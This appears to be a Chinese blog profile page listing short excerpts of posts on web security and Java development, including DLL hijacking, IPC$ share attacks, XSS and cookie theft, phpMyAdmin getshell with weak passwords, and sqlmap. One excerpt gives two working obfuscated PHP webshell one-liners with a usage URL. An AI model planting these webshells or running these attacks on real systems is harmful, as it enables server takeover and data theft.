- 博客(17)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 DLL劫持
可执行文件运行时会经历以下步骤:第一步:Windows加载器会将PE(Portable Executable File Format)文件映射到内存中第二步:分析可执行文件的导入表,寻找执行文件所需要的DLL文件(因为导入表中只有DLL文件的名称,没有路径信息,因此有了第三步)第三步:按照第二步提供的DLL文件名称,Windows加载器在磁盘上搜索DLL文件,当前程序所在的目录(不会搜索父目录和子目录)->Windows系统目录->环境变量(按照这个顺序依次寻找DLL文件,一旦找到就停止寻
2021-07-18 22:49:01
952
原创 ipc$攻击
ipc$攻击使用条件:1.开放了139、445端口2.目标开启ipc$共享3.获取用户账号密码向默认共享复制失败原因:1.对方没开启默认共享,能建立ipc连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c,d,admin,admin,admin之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc连接成功只能说明对方打开了ipc连接成功只能说明对方打开了
2021-06-27 22:16:24
2726
原创 从前端页面渲染了解xss的三种区别
渲染流程要想理解DOM型的xss首先得先了解前端页面的渲染过程。前端页面接收到服务器返回的html文档后,进行如下的操作。三种xss的区别先谈谈反射型xss与存储型xss。形成原因:都是因为服务器没有对用户的输入以及自身输出的数据进行检查、过滤。区别:它们区别是存储型xss会把数据存入数据库当中。而反射型xss是非持久化的。利用:例如存储型xss容易出现在留言板中,凡是浏览了此留言板都会受到xss攻击,大量用户cookie被窃取。而反射型xss一般容易出现在搜索页面,它是非持久化的,需要欺骗用
2021-03-28 11:02:47
1314
原创 phpmyadmin的getshell
在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有多种方法进行getshell。第一步:获得网站真实路径 1.执行select @@basedir; 这个语句是利用 Mysql 的特性,输出绝对路径。 2.phpinfo() 3.构造报错页面(页面访问报错,sql注入报错,文件
2021-03-25 11:14:46
297
原创 免杀一句话
<?phparray_map($_GET[func], array($_POST[cmd]));?>利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd-----------------------------------------------------------------------------------------<?php$_GET['a']($_POST['b']);
2021-03-25 11:13:42
384
原创 git使用
git config --global user.name “名称”git config --global user.email “邮箱”git init(在项目文件中执行此命令,初始化项目,生成.git文件)git status(查看哪些文件在缓存区,哪些不在)gid add 文件名(提交文件到缓存区)git rm --cached 文件名(删除缓冲区中的文件)git add .(提交项目中的所有文件到缓存区)git commit -m “说明”(提交文件到本地仓库)git remote
2021-03-25 11:05:29
71
原创 基于RedHat7桥接模式的网卡配置
cd /etc/sysconfig/network-scripts/vim ifcfg-eno16777736HWADDR=00:0C:29:92:3A:D7TYPE=EthernetBOOTPROTO=staticDEFROUTE=yesPEERDNS=yesPEERROUTES=yesIPV4_FAILURE_FATAL=noIPV6INIT=yesIPV6_AUTOCONF=yesIPV6_DEFROUTE=yesIPV6_PEERDNS=yesIPV6_PEERRO..
2021-01-16 22:11:20
537
原创 静态代理与动态代理(含主要源码分析)
为什么要用代理?假设让你在项目的所有类的方法中加入打印日志这段代码,如何在不修改已有代码的前提下,完成这个需求呢?这就需要用到代理了。静态代理:例如,如何在不修改代码前提下,在类hk中的print()方法中加入打印日志public class hk { public void print(){ System.out.println("打印!"); }}首先应实现一个接口public interface abc { void print();}public class hk
2020-08-05 20:15:06
170
原创 Servlet中的response
向response中写数据的两种方法:getOutputStream(),getWriter()文件下载:图片认证:BufferedImage image = new BufferedImage(WIDTH,HEIGHT,TYPE_INT_RGB)Graphics g =image.getGraphics()setBackGround(g) //设置背景色setBorder(g) //设置边框drawRandomLine(g) //画干扰线drawRandomNum((
2020-07-15 18:05:09
253
原创 Servlet中请求重定向与转发
请求重定向:一个WEB资源收到客户端请求后,通知客户端去访问另外一个web资源(特定场景才用,比如用户登入,购物车)特点:浏览器地址会发生变化。浏览器会向服务器发送两次请求,意味着有两个request/responseresponse.setStatus(302)response.setHeader("location","/day06/1.html")或response.sendRedirect转发:一个WEB资源收到客户端请求后,WEB资源帮客户端去访问另外一个web资源。特点:刷新则
2020-07-15 17:49:27
150
原创 Tomcat中虚拟目录映射
WEB应用一般放在Tomcat下的webapps中,服务器会自动生成虚拟目录映射,比如在webapps中放入day05文件,则浏览器访问 localhost:8080/day05就可以访问到了。具体WEB应用中的虚拟目录映射,就得在WEB-INF中的xml文件中配置。------------------------------------------------------------------------------------当WEB应用不在webapps中如何配置?比如服务器在D盘,想要访问C
2020-05-29 18:29:51
189
原创 学习Servlet
Servlet其实就是一个遵循Servlet开发的java类。Servlet运行过程:一:服务器检查是否有Servlet实例对象,有则执行第四步。二:首次访问Servlet时,创建Servlet实例对象。三:调用Servlet实例对象的init()方法初始化。四:服务器创建HttpServletRequest对象和HttpServletResponse对象并且调用Servlet实例对象的service()方法。五:服务器获取HttpServletResponse对象创建HTTP响应信息给客户端。
2020-05-29 18:25:34
141
原创 JDBC
第一步:加载驱动程序;第二步:连接数据库;第三步:访问数据库;第四步:执行查询; Connection conn = null; PreparedStatement ps=null; 或 Statement stmt = null; ResultSet res = null; String sql =xxxxxxxxx;Class.forName(“com.mysql.jdbc.Driver”);conn=DriverManager
2020-05-15 13:45:28
113
原创 Java swing+mysql实现定制化租房系统
目录1引言… 21.1课程设计的选题………………………………………………………… .21.2编写目的及背景…21.3参考资料… 22项目概述… 32.1产品描述… 32.2产品功能… 32.3用户特点… 32.4一般约束… 42.5假设和依据… 43具体需求… 43.1外部接口需求… 43.1.1用户接口… 43.1.2硬件接口… 43.1.3软件接口… 53.2功...
2020-05-04 18:13:02
2496
原创 sqlmap的一些基本使用
有些网站需要登入的所以必须加cookie绕过登入,不需要登入则不用加----------------------------------------------------------------------------------一般步骤:sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”...
2020-04-27 15:01:14
1036
原创 关于https和数字证书的一些理解
数字证书申请过程:操作系统中本就存在机构的证书,其中有机构的公钥,现在我生成一个公钥,把自己的公钥和个人信息用机构公钥加密然后发给机构,然后机构用自己的私钥解密,然后机构把我的数据用hash算法生成一个字符串,摘取其中的部分信息再用机构私钥加密就成了数字签名,把数字签名,个人信息,公钥,颁发机构信息等等组成了数字证书,然后交给我并且给我一个我生成的公钥对应的私钥。(万一给机构公钥和信息的途中被黑客...
2020-04-16 20:58:26
187
Java swing+mysql实现定制化租房系统
2020-05-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人